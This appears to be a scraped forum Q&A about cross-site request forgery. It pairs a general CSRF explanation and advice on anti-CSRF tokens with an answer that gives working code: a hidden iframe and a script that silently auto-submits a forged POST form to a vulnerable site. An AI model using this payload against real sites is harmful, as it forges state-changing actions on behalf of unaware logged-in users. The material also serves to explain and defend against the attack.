Menu
I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).
Example:
<form method='POST' action='http://vulnerablesite.com/form.php'> <input type='hidden' name='criticaltoggle' value='true' <input type='submit' value='submit'> </form> On an external site, what would I need to do to trigger this form automatically and silently?
275
Cross-site request forgery (CSRF, sometimes pronounced “sea surf” and not to be confused with cross-site scripting) is a simple yet invasive malicious exploit of a website. It involves a cyberattacker adding a button or link to a suspicious website that makes a request to another site you're authenticated on.
CSRF GET RequestThe simplest CSRF attack is simply to trick a user into making a GET request to a specific URL. This can done by putting the URL into a deceptively named link. The link could be put in a blog comment (lots of WordPress exploits have used this technique), a post on a web forum, or in a phishing email.
Generally the answer is: Any form should be CSRF protected.
The most effective method of protecting against CSRF is by using anti-CSRF tokens. The developer should add such tokens to all forms that allow users to perform any state-changing operations. When an operation is submitted, the web application should then check for the presence of the correct token.
One solution would be to open the form’s action in a frame like an iframe:
<iframe style="display:none" name="csrf-frame"></iframe> <form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form"> <input type='hidden' name='criticaltoggle' value='true'> <input type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script> If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
